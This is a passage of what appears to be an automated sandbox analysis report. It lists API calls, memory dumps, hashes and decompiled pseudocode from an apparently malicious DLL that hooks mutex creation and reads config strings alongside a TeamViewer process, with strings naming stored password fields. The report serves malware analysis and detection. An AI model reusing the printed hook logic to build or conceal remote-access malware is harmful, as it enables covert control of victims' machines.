                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985D79
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985D80
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 70985D8B
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 70985D96
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 70985D9D
                                                                                                        • GetTickCount.KERNEL32 ref: 70985DAE
                                                                                                        • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985DBD
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985DC8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: HeapInternet$HttpRequest$wsprintf$Process$CloseCountHandleHeadersOptionTick$AllocFreeOpen$ConnectErrorLastRandomSendSleep
                                                                                                        • String ID: N
                                                                                                        • API String ID: 2546452625-1161386698
                                                                                                        • Opcode ID: 321ec050df4079f926fdfa2280ae335633a7ae2c1dfc872633eb210d30e402ed
                                                                                                        • Instruction ID: 88841764c68fdaf19a6fad5b7c325c1c999d981032fe82be9987fcf4e79939d1
                                                                                                        • Opcode Fuzzy Hash: 321ec050df4079f926fdfa2280ae335633a7ae2c1dfc872633eb210d30e402ed
                                                                                                        • Instruction Fuzzy Hash: E4B17CB2518300BFD3009F61CC89F6F7BA8EB88B45F604529FA46A63D1D774E9058B66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004C26DD, Relevance: 69.1, APIs: 1, Strings: 38, Instructions: 801COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004C26EB
                                                                                                          • Part of subcall function 004D8D4F: __EH_prolog3_catch_GS.LIBCMT ref: 004D8D56
                                                                                                          • Part of subcall function 004D8D4F: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,0000003C,004C2457,?,Proxy_IP), ref: 004D8DAB
                                                                                                          • Part of subcall function 004D85BC: __EH_prolog3.LIBCMT ref: 004D85C3
                                                                                                          • Part of subcall function 004D85BC: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,00000008,004C2410), ref: 004D85F6
                                                                                                          • Part of subcall function 004BD13E: __EH_prolog3.LIBCMT ref: 004BD145
                                                                                                          • Part of subcall function 004D849A: __EH_prolog3.LIBCMT ref: 004D84A1
                                                                                                          • Part of subcall function 004D849A: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,?,?,?,?,?,00000008,004C3112,Logging), ref: 004D84D4
                                                                                                          • Part of subcall function 004D8D4F: _wmemset.LIBCPMT ref: 004D8DEE
                                                                                                          • Part of subcall function 004D8D4F: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004D8E13
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3QueryValue$H_prolog3_catch__wmemset
                                                                                                        • String ID: 0.96$CUse$ClientIC$ClientID$CustomRouter$GatewayAllowed$Gatewayname$HttpThreadLimit$IPCConnectPort$IPCListenPort$Init: Load Registry Settings failed [HKEY_SOFTWARE] (.\Global.cpp, 521)$InstallationDirectory$LastKeepalivePerformance$LastRouterPerformance$LicenseType$LimitForGetInsteadPost$ListenHttp$Logging$MaxHttpPacketSizeWithPriorization$MaxPacketSizeWithPriorization$MinimizeToTray$SecurityPasswordAES$Security_Password$Security_Password_Secure$ServerPassword$ServerPasswordAES$ServerPasswordSecure$TcpThreadLimit$TotalSessions$TotalTrafficKilobytes$UseTestMasterKeys$UseTestServer$Version$VpnIP$master.dyngate.com$master.teamviewer.com$tVmore$ecure$useUDP
                                                                                                        • API String ID: 4186790705-3214323485
                                                                                                        • Opcode ID: 1f0247c280118f383dfa7ac6c9f47aac04a095577221e6a065ef9f0f4efa208e
                                                                                                        • Instruction ID: f78076c062f6ca7fd13033a47dd0d286148e18dc9ca1db24686cad4d793e2d17
                                                                                                        • Opcode Fuzzy Hash: 1f0247c280118f383dfa7ac6c9f47aac04a095577221e6a065ef9f0f4efa208e
                                                                                                        • Instruction Fuzzy Hash: C562C2709052C8EACF15FB79C926ADE7FA45F21308F1440AEF44127292DB795B08DB6B
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70987E20, Relevance: 68.5, APIs: 37, Strings: 2, Instructions: 257sleepstringsynchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 69%
                                                                                                        			E70987E20(struct _SECURITY_ATTRIBUTES* _a4, int _a8, CHAR* _a12) {
				struct _SECURITY_ATTRIBUTES* _v0;
				struct _SECURITY_ATTRIBUTES* _v4;
				char _v1044;
				short _v1052;
				char _v1304;
				char _v1308;
				char _v1312;
				char _v1316;
				char _v1320;
				void* _t27;
				char* _t28;
				CHAR* _t30;
				void* _t35;
				void* _t43;
				CHAR* _t44;
				CHAR* _t50;
				void* _t56;
				WCHAR* _t57;
				intOrPtr _t58;
				char _t64;
				intOrPtr _t67;
				void* _t68;
				void* _t72;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr _t81;
				intOrPtr _t87;
				CHAR* _t90;
				intOrPtr _t95;
				intOrPtr _t100;
				CHAR* _t101;
				void* _t104;
				void* _t106;
				CHAR* _t109;
				char* _t110;
				intOrPtr _t129;

				_t110 =  &_v1308;
				_t109 = _a12;
				if(_t109 == 0) {
					L21:
					_t27 = CreateMutexA(_a4, _a8, _t109); // executed
					return _t27;
				} else {
					_t28 =  *0x7098f620; // 0x783f38
					if(StrCmpNIA(_t109, _t28, 0xa) == 0) {
						L4:
						_t30 =  *0x7098f62c; // 0x784250
						if(lstrcmpiA(_t109, _t30) == 0) {
							if( *0x7098f5c4 > 0) {
								do {
									Sleep(0x3e8);
									_t73 =  *0x7098f5c4; // 0x0
									_t74 = _t73 - 1;
									 *0x7098f5c4 = _t74;
								} while (_t74 > 0);
							}
							if( *0x7098f568 != 0) {
								_t87 =  *0x7098f5e0; // 0xa42bb0
								_push(_t87);
								wsprintfW( &_v1052, StrChrW(0x7098ca80, 0x22));
								_t67 =  *0x7098f5cc; // 0xa4b6c8
								_push(_t67);
								_push( &_v1044);
								_t68 = E70982AC0();
								_t110 =  &(_t110[0x14]);
								if(_t68 != 0) {
									_t106 = 0;
									while(1) {
										_t100 =  *0x7098f5f4; // 0x1
										_push(_t100);
										_push(0x45);
										_push(_t109);
										wsprintfA( &_v1312, StrChrA(0x7098cde8, 0x25));
										_t110 =  &(_t110[0x14]);
										_t72 = OpenEventA(2, 0,  &_v1304);
										if(_t72 != 0) {
											break;
										}
										Sleep(0x3e8);
										_t106 = _t106 + 1;
										if(_t106 < 0xa) {
											continue;
										}
										goto L13;
									}
									_push(_t72);
									L20:
									CloseHandle();
									ExitProcess(0);
								}
							}
							L13:
							_v1316 = 0;
							while(1) {
								_t129 =  *0x7098f5f4; // 0x1
								_push(0 | _t129 == 0x00000000);
								_push(0x45);
								_push(_t109);
								wsprintfA( &_v1316, StrChrA(0x7098cde8, 0x25));
								_t110 =  &(_t110[0x14]);
								_t104 = OpenEventA(2, 0,  &_v1308);
								if(_t104 == 0) {
									break;
								}
								_push(_t104);
								if( *0x7098f5f4 == 0) {
									goto L20;
								}
								SetEvent();
								CloseHandle(_t104);
								Sleep(0x3e8);
								_t64 = _v1312 + 1;
								_v1312 = _t64;
								if(_t64 < 0x3c) {
									continue;
								}
								break;
							}
							_push(0xc);
							_push(0x7098f51c);
							L7098BF02();
							_t95 =  *0x7098f5f4; // 0x1
							_push(_t95);
							_push(0x45);
							_push(_t109);
							wsprintfA( &_v1320, StrChrA(0x7098cde8, 0x25));
							_t43 = CreateEventA(_v4, 1, 0,  &_v1312);
							_push(0x4b);
							 *0x7098f51c = _t43;
							_t44 =  *0x7098f62c; // 0x784250
							_push(_t44);
							_push(StrChrA(0x7098ca94, 0x47));
							wsprintfA( &_v1320, StrChrA(0x7098ca8c, 0x25));
							 *0x7098f520 = CreateEventA(0, 1, 0,  &_v1312);
							E70982200(_t48, 6);
							_t50 =  *0x7098f62c; // 0x784250
							_push(0x52);
							_push(_t50);
							_push(StrChrA(0x7098ca94, 0x47));
							wsprintfA( &_v1320, StrChrA(0x7098ca8c, 0x25));
							 *0x7098f524 = CreateEventA(0, 1, 0,  &_v1312);
							E70982200(_t54, 6);
							_t56 = CreateThread(0, 0, E709855D0, 0, 0, 0); // executed
							 *0x7098f5c0 = _t56;
							_t57 = StrChrW(0x7098c464, 0x2e);
							_t58 =  *0x7098f5cc; // 0xa4b6c8
							E70982EF0(_t58, _t57);
							_t110 =  &(_t110[0x54]);
						}
						_t81 =  *0x7098f5f4; // 0x1
						_push(_t81);
						_push(0x48);
						_push(_t109);
						wsprintfA( &_v1316, StrChrA(0x7098cde8, 0x25));
						_t35 = CreateMutexA(_v0, _a4,  &_v1308); // executed
						return _t35;
					} else {
						_t90 =  *0x7098f624; // 0x784294
						if(lstrcmpiA(_t109, _t90) == 0) {
							goto L4;
						} else {
							_t101 =  *0x7098f628; // 0x798f80
							if(lstrcmpiA(_t109, _t101) != 0) {
								goto L21;
							} else {
								goto L4;
							}
						}
					}
				}
			}







































                                                                                                        0x70987e20
                                                                                                        0x70987e27
                                                                                                        0x70987e31
                                                                                                        0x70988119
                                                                                                        0x7098812a
                                                                                                        0x70988138
                                                                                                        0x70987e37
                                                                                                        0x70987e37
                                                                                                        0x70987e4e
                                                                                                        0x70987e70
                                                                                                        0x70987e70
                                                                                                        0x70987e89
                                                                                                        0x70987e96
                                                                                                        0x70987ea0
                                                                                                        0x70987ea5
                                                                                                        0x70987eab
                                                                                                        0x70987eb0
                                                                                                        0x70987eb1
                                                                                                        0x70987eb6
                                                                                                        0x70987ea0
                                                                                                        0x70987ec1
                                                                                                        0x70987ec7
                                                                                                        0x70987ecd
                                                                                                        0x70987ee4
                                                                                                        0x70987eea
                                                                                                        0x70987eef
                                                                                                        0x70987ef7
                                                                                                        0x70987ef8
                                                                                                        0x70987efd
                                                                                                        0x70987f02
                                                                                                        0x70987f04
                                                                                                        0x70987f06
                                                                                                        0x70987f06
                                                                                                        0x70987f0c
                                                                                                        0x70987f0d
                                                                                                        0x70987f0f
                                                                                                        0x70987f1f
                                                                                                        0x70987f21
                                                                                                        0x70987f2d
                                                                                                        0x70987f35
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987f40
                                                                                                        0x70987f46
                                                                                                        0x70987f4a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987f4a
                                                                                                        0x7098810a
                                                                                                        0x7098810b
                                                                                                        0x7098810b
                                                                                                        0x70988113
                                                                                                        0x70988113
                                                                                                        0x70987f02
                                                                                                        0x70987f4c
                                                                                                        0x70987f4c
                                                                                                        0x70987f54
                                                                                                        0x70987f56
                                                                                                        0x70987f5f
                                                                                                        0x70987f60
                                                                                                        0x70987f62
                                                                                                        0x70987f72
                                                                                                        0x70987f74
                                                                                                        0x70987f86
                                                                                                        0x70987f8a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987f93
                                                                                                        0x70987f94
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987f9a
                                                                                                        0x70987fa1
                                                                                                        0x70987fac
                                                                                                        0x70987fb6
                                                                                                        0x70987fb7
                                                                                                        0x70987fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987fbe
                                                                                                        0x70987fc0
                                                                                                        0x70987fc2
                                                                                                        0x70987fc7
                                                                                                        0x70987fcc
                                                                                                        0x70987fd2
                                                                                                        0x70987fd3
                                                                                                        0x70987fd5
                                                                                                        0x70987fe5
                                                                                                        0x70988001
                                                                                                        0x70988003
                                                                                                        0x70988005
                                                                                                        0x7098800a
                                                                                                        0x7098800f
                                                                                                        0x70988019
                                                                                                        0x70988029
                                                                                                        0x7098803e
                                                                                                        0x70988043
                                                                                                        0x70988048
                                                                                                        0x70988050
                                                                                                        0x70988052
                                                                                                        0x7098805c
                                                                                                        0x7098806c
                                                                                                        0x70988081
                                                                                                        0x70988086
                                                                                                        0x7098809d
                                                                                                        0x709880aa
                                                                                                        0x709880af
                                                                                                        0x709880b6
                                                                                                        0x709880bc
                                                                                                        0x709880c1
                                                                                                        0x709880c1
                                                                                                        0x709880c4
                                                                                                        0x709880ca
                                                                                                        0x709880cb
                                                                                                        0x709880cd
                                                                                                        0x709880dd
                                                                                                        0x709880f7
                                                                                                        0x70988107
                                                                                                        0x70987e50
                                                                                                        0x70987e50
                                                                                                        0x70987e5c
                                                                                                        0x00000000
                                                                                                        0x70987e5e
                                                                                                        0x70987e5e
                                                                                                        0x70987e6a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987e6a
                                                                                                        0x70987e5c
                                                                                                        0x70987e4e

                                                                                                        APIs
                                                                                                        • StrCmpNIA.SHLWAPI(?,00783F38,0000000A), ref: 70987E40
                                                                                                        • lstrcmpiA.KERNEL32(?,00784294), ref: 70987E58
                                                                                                        • lstrcmpiA.KERNEL32(?,00798F80), ref: 70987E66
                                                                                                        • lstrcmpiA.KERNEL32(?,00784250), ref: 70987E79
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 70987EA5
                                                                                                        • StrChrW.SHLWAPI(7098CA80,00000022,00A42BB0), ref: 70987ED5
                                                                                                        • wsprintfW.USER32 ref: 70987EE4
                                                                                                        • StrChrA.SHLWAPI(7098CDE8,00000025,?,00000045,00000001), ref: 70987F17
                                                                                                        • wsprintfA.USER32 ref: 70987F1F
                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 70987F2D
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 70987F40
                                                                                                        • StrChrA.SHLWAPI(7098CDE8,00000025,?,00000045,00000000), ref: 70987F6A
                                                                                                        • wsprintfA.USER32 ref: 70987F72
                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 70987F80
                                                                                                        • SetEvent.KERNEL32(00000000), ref: 70987F9A
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70987FA1
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 70987FAC
                                                                                                        • CreateMutexA.KERNEL32(?,?,?), ref: 7098812A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: EventSleeplstrcmpiwsprintf$Open$CloseCreateHandleMutex
                                                                                                        • String ID: 8?x$PBx
                                                                                                        • API String ID: 1317985339-3843287149
                                                                                                        • Opcode ID: a7bb692bf480f1f19a392d4ad932986a1dc2ce0a79ec14775f89fc22fe31f56f
                                                                                                        • Instruction ID: bfc347122cb35cc7494e7dd34fdbaf52186b99df179771dd9f3eabd6a6f61d00
                                                                                                        • Opcode Fuzzy Hash: a7bb692bf480f1f19a392d4ad932986a1dc2ce0a79ec14775f89fc22fe31f56f
                                                                                                        • Instruction Fuzzy Hash: 808186B2658304AFE210DB66CC4DF6F77ACEB98B05F104529F606D63D1EB70E9049B62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004E20FD, Relevance: 63.2, APIs: 2, Strings: 33, Instructions: 1921sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004E210B
                                                                                                          • Part of subcall function 0050E92E: __EH_prolog3.LIBCMT ref: 0050E935
                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E2298
                                                                                                          • Part of subcall function 004A1C93: __EH_prolog3.LIBCMT ref: 004A1C9A
                                                                                                          • Part of subcall function 004A1C93: EnterCriticalSection.KERNEL32(?,00000004,004A3359,00000008,004B9859,?,?,?,?,?,?,?,?,?,?,00000068), ref: 004A1CA8
                                                                                                          • Part of subcall function 004A1C93: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000068), ref: 004A1CC9
                                                                                                          • Part of subcall function 005075E8: __EH_prolog3.LIBCMT ref: 005075EF
                                                                                                          • Part of subcall function 004C5619: __EH_prolog3_catch.LIBCMT ref: 004C563B
                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,004E3FC0,00000000,00000000,?,?,00000338,?,?,?,?,?,?,Default), ref: 004A18C0
                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                          • Part of subcall function 004BD13E: __EH_prolog3.LIBCMT ref: 004BD145
                                                                                                          • Part of subcall function 004F2913: __EH_prolog3.LIBCMT ref: 004F291A
                                                                                                          • Part of subcall function 004BB266: __EH_prolog3.LIBCMT ref: 004BB26D
                                                                                                          • Part of subcall function 004A2DE3: __EH_prolog3.LIBCMT ref: 004A2DEA
                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004E90F2,00000000,?,?,?,?,?,?,?,?,Default,?,?), ref: 004A1C05
                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,Default,?,?,?,?,00000000,?,?), ref: 004A1C45
                                                                                                          • Part of subcall function 004B5743: __EH_prolog3.LIBCMT ref: 004B574A
                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(10000000,?,00000000,00000100), ref: 004B5794
                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(?,?,00000000,00000100), ref: 004B57CB
                                                                                                          • Part of subcall function 0040D53A: char_traits.LIBCPMT ref: 0040D55F
                                                                                                          • Part of subcall function 004DE289: __EH_prolog3.LIBCMT ref: 004DE290
                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,00506D6D,?,?,PingThread,00000000,00000068), ref: 004A1804
                                                                                                          • Part of subcall function 004C125C: __EH_prolog3.LIBCMT ref: 004C1263
                                                                                                          • Part of subcall function 004E1A9C: __EH_prolog3.LIBCMT ref: 004E1AB8
                                                                                                          • Part of subcall function 004DEEE8: __EH_prolog3.LIBCMT ref: 004DEEF3
                                                                                                          • Part of subcall function 004DEFF8: __EH_prolog3.LIBCMT ref: 004DF003
                                                                                                          • Part of subcall function 0050E7A1: __EH_prolog3.LIBCMT ref: 0050E7A8
                                                                                                          • Part of subcall function 004A2880: __EH_prolog3.LIBCMT ref: 004A2887
                                                                                                          • Part of subcall function 004A2880: EnterCriticalSection.KERNEL32(?,00000004,004C5A03,?,00000002,?,00000000,0000042C), ref: 004A2895
                                                                                                          • Part of subcall function 004A2880: LeaveCriticalSection.KERNEL32(?,?,00000002,?,00000000,0000042C), ref: 004A28B0
                                                                                                          • Part of subcall function 004A2E2B: __EH_prolog3.LIBCMT ref: 004A2E32
                                                                                                          • Part of subcall function 0040E8A9: __EH_prolog3.LIBCMT ref: 0040E8B0
                                                                                                          • Part of subcall function 004C1900: __EH_prolog3.LIBCMT ref: 004C1907
                                                                                                          • Part of subcall function 004C1A4B: __EH_prolog3.LIBCMT ref: 004C1A52
                                                                                                          • Part of subcall function 004BED5B: __EH_prolog3.LIBCMT ref: 004BED62
                                                                                                          • Part of subcall function 0050DBBD: __EH_prolog3.LIBCMT ref: 0050DBC4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$EnterInitializeLeave$LoadString$DeleteH_prolog3_H_prolog3_catchSleep_swprintfchar_traits
                                                                                                        • String ID: - $ MH=$00-00000-000000-000000$BLOCKED$Client$Commercial$GWLevel$HTTPIN$HTTPOUT$HideOnlineStatus$IsDemoMachine$Keepalive$Language$LastKeepaliveError$LastKeepalivePerformance$LicenseType$Login$MC.L $MC.Login.WrongKey SH=$NoOfActiveKeepalive$Router$Runtime$SupportedFeatures$TCPIN$TCPOUT$TVQS$TVQSC$TeamViewer$UNKNOWN$UsageEnvironment$VPN$VPNMAC$ping3.dyngate.com
                                                                                                        • API String ID: 2594360396-1895621411
                                                                                                        • Opcode ID: 3facba084faa18b0900c8aba13ae63737bc503d251808d063173546a56203771
                                                                                                        • Instruction ID: 507374b0a125fca44c731598b8375f7de032354b548efb72292124f8c3c2b4fa
                                                                                                        • Opcode Fuzzy Hash: 3facba084faa18b0900c8aba13ae63737bc503d251808d063173546a56203771
                                                                                                        • Instruction Fuzzy Hash: D1F21271804288EEDF11EBB5CD56AED7B78AF22308F14819EF40667292DB785F08C765
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70986F50, Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 97%
                                                                                                        			E70986F50() {
				void* _t50;
				long _t58;
				WCHAR* _t60;
				WCHAR* _t61;
				WCHAR* _t66;
				WCHAR* _t67;
				long _t68;
				WCHAR* _t73;
				int _t77;
				WCHAR* _t81;
				WCHAR* _t82;
				WCHAR* _t86;
				int _t87;
				void* _t89;
				void* _t91;
				WCHAR* _t92;
				void* _t94;
				short _t99;
				WCHAR* _t101;
				WCHAR* _t102;
				WCHAR* _t105;
				WCHAR* _t107;
				WCHAR* _t108;
				WCHAR* _t110;
				WCHAR* _t111;
				WCHAR* _t115;
				WCHAR* _t116;
				WCHAR* _t123;
				WCHAR* _t128;
				int _t129;
				WCHAR* _t132;
				WCHAR* _t139;
				long _t140;
				long _t141;
				signed int _t145;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t145 =  *(_t152 + 0x228);
				if(_t145 != 0) {
					_t94 =  *(_t145 + 4);
					if(_t94 != 0) {
						HeapFree(GetProcessHeap(), 0, _t94);
					}
					_t50 =  *(_t145 + 8);
					if(_t50 != 0) {
						_t50 = HeapFree(GetProcessHeap(), 0, _t50);
					}
				}
				if( *((intOrPtr*)(_t152 + 0x230)) != 0) {
					return _t50;
				} else {
					if(_t145 == 0) {
						_t92 =  *0x7098f57c; // 0xa65be8
						 *((short*)(_t152 + 0x24)) = 0;
						_t139 =  *0x7098f58c; // 0x7837d8
						 *((intOrPtr*)(_t152 + 0x28)) = 0x640067;
						WritePrivateProfileStringW(_t139, _t152 + 0x20, 0, _t92);
					}
					 *((short*)(_t152 + 0x12)) = 0;
					asm("sbb eax, eax");
					_t99 = ( ~_t145 & 0xfffffff5) + 0x0000006e & 0x0000ffff;
					 *((intOrPtr*)(_t152 + 0x14)) = 0x640068;
					 *(_t152 + 0x18) = _t99;
					E70981DC0(0x7098f050);
					_t101 =  *0x7098f57c; // 0xa65be8
					_t153 = _t152 + 4;
					_t102 =  *0x7098f58c; // 0x7837d8
					_t58 = GetPrivateProfileStringW(_t102, _t153 + 0x20, 0x7098f050, _t153 + 0x2c, 0x104, _t101); // executed
					_t140 = _t58;
					E70981DC0(0x7098f050);
					_t154 = _t153 + 4;
					if(_t145 == 0) {
						_t60 =  *0x7098f57c; // 0xa65be8
						_t61 =  *0x7098f58c; // 0x7837d8
						 *(_t154 + 0x18) = 0x63;
						WritePrivateProfileStringW(_t61, _t154 + 0x18, _t154 + 0x28, _t60);
						_t123 =  *0x7098f57c; // 0xa65be8
						 *((short*)(_t154 + 0x1c)) = 0x6e;
						_t105 =  *0x7098f58c; // 0x7837d8
						WritePrivateProfileStringW(_t105, _t154 + 0x18, 0, _t123);
					} else {
						_t14 = _t140 + _t140 + 2; // 0x74b397f2
						_t91 = HeapAlloc(GetProcessHeap(), 8, _t14);
						 *(_t145 + 4) = _t91;
						RtlMoveMemory(_t91, _t154 + 0x28, _t140 + _t140);
						 *_t145 = _t140;
					}
					 *((short*)(_t154 + 0x16)) = 0x70;
					 *(_t154 + 0x18) = _t99;
					E70981DC0(0x7098f008);
					_t66 =  *0x7098f57c; // 0xa65be8
					_t155 = _t154 + 4;
					_t67 =  *0x7098f58c; // 0x7837d8
					_t68 = GetPrivateProfileStringW(_t67, _t155 + 0x20, 0x7098f008, _t155 + 0x2c, 0x104, _t66); // executed
					_t141 = _t68;
					E70981DC0(0x7098f008);
					_t156 = _t155 + 4;
					if(_t145 == 0) {
						_t107 =  *0x7098f57c; // 0xa65be8
